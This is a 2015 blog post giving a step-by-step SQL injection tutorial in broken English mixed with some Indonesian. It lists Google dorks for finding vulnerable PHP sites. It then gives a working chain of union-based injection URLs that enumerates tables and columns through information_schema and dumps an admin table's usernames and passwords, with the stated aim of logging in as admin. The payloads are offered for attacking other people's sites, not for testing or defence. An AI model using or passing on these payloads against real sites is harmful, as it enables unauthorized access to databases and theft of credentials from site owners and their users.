download

Download link

Monday, 16 March 2015

SQl Injection Full Tutorial [Step By Step]



Keyword you need to know
-------------------------------
Character : ', - 
Comments : /*, --
-------------------------------
Information: "Information_schema" just working our for version 5.x and above 

Google Dork that will be used is ->


"inurl:news.php?id="
"inurl:index.php?id="
"inurl:trainers.php?id="
"inurl:buy.php?category="
"news-article.php?id="
"inurl:article.php?ID="

-------------------------First Step-------------------------

 www.target.com/news.php?id=1
---add the character 'at the end of the url to see if the site is vuln to
sql injection or not.

inject sample code:-

www.target.com/news.php?id=1
or
www.target.com/news.php?id=-1

Examples of error messages :-
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near line 1

warning: mysql_fetch_array(): supplied argument is not a valid MYSQL
result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line

-------------------------Second Step-------------------------

Find the number of tables available in the database.
Add : +order+by+1-- at the end of url
Contoh:

Code:
www.target.com/news.php?id=1+order+by+1-- 
atau
www.target.com/news.php?id=1+order+by+1/* check in stages
www.target.com/news.php?id=1+order+by+2/*
www.target.com/news.php?id=1+order+by+3/* keep looking untill error out

For this tutorial table amount obtained was 3.

-------------------------Third Step-------------------------

Use the Union command to remove the numbers that we use later.
order to be used : +union+select+1,2,3-- end of the url


Example
www.target.com/news.php?id=1+union+select+1,2,3--

Example: number 2 out.

then we enter the version() in number (2),

Example:
www.target.com/news.php?id=1+union+select+1,version(),3--

and the display version will appear in the figures.
Example:
5.1.47-community-log

------
|info|
------ 

version() = to see msql version used
database() = to see the database name used



-------------------------Fourth Step-------------------------

to see, the names of the table that is in the web, order
table_name park in the figures that came out earlier -> (2)
+from+information_schema.tables-- ---> park behind the last digit.

Example:
www.target.com/news.php?id=1+union+select+1,table_name,3+from+information_schema.tables-- 
or we add the command character- in front of the first digit
www.target.com/news.php?id=-1+union+select+1,table_name,3+from+information_schema.tables-- 

-------------------------Step Fifth-------------------------
Remove all content is in the table,

group_concat(table_name) ---> park in the figures that came out earlier (2)
+from+information_schema.tables+where+table_schema=database()-- ---> Put after the last digit.

Contoh:

www.target.com/news.php?id=1+union+select+1,group_concat(table_name),3+from+
information_schema.tables+where+table_schema=database()-- 

-------------------------Step Sixth-------------------------

Exit right content is in TABLE

group_concat(column_name) ---> park in the figures that came out earlier (2)
+from+information_schema.columns+where+table_name=0xResulOfConvertedTextTableAdmin--

(TABLE NAME HAS BEEN PUT IN TO CONVERT HEXADECIMEL)

------
|info|
------ 
Website that can be used to convert the table name to hexadecimel
-----> www.piclist.com/techref/ascii.htm
-----> www.centricle.com/tools/ascii-hex/

Column which we will use as example the table ADMIN
and convert results are 41444D494E

Example:

www.target.com/news.php?id=1+union+select+1,group_concat(column_name),3+from+
information_schema.columns+where+table_name=0x41444D494E-- 

-------------------------Step Seven-------------------------

Remove the contents of the results that we managed to get from table Admin

concat_ws(0x3a,"column names contained in the table ADMIN") ---> park in the figures that came out earlier (2)
+from+Admin-- --> The original column

Contoh:

www.target.com/news.php?id=1+union+select+1,concat_ws(0x3a,id,username,password),3+from+Admin-- 

And we obtain the username and password admin for the website.


Then You Has o Find The Admin Login :)....

More Short Tutorial:-
http://pastebin.com/pVVjSzhF

No comments:

Post a Comment